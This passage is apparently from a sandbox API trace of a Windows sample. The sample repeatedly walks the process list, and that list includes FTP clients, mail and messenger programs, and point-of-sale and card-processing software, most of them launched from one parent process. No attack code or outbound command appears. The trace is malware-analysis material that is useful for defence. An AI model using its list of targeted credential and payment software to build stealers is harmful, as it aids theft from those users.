lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0198.459] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0198.461] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0198.463] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0198.465] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0198.467] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0198.469] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.470] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.472] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0198.513] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.515] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.518] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.519] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.521] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0198.523] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0198.524] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0198.526] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0198.528] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0198.531] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0198.533] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0198.535] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0198.538] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0198.540] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0198.542] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0198.544] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0198.547] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0198.612] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0198.614] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0198.617] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0198.620] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0198.622] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0198.624] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0198.626] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0198.628] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0198.631] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0198.634] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0198.637] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0198.639] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0198.641] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0198.645] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0198.781] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0198.784] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0198.787] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0198.790] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0198.793] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0198.797] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0198.799] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0198.802] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0198.805] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0198.808] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0198.811] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0198.815] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0198.823] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0198.828] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0198.830] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0198.833] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0198.836] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0198.839] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0198.841] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0198.844] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0198.847] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0198.850] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0198.852] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0198.855] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0198.857] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0198.860] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0198.865] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0198.868] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0198.871] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0198.873] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0198.876] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0198.879] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0198.881] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0198.884] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0198.888] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0198.892] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0198.895] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0198.897] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.900] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.907] Process32Next (in: hSnapshot=0x207c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0198.909] CloseHandle (hObject=0x207c) returned 1 [0198.909] Sleep (dwMilliseconds=0x64) [0199.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19d4 [0199.049] Process32First (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.051] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.053] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.074] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.076] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, 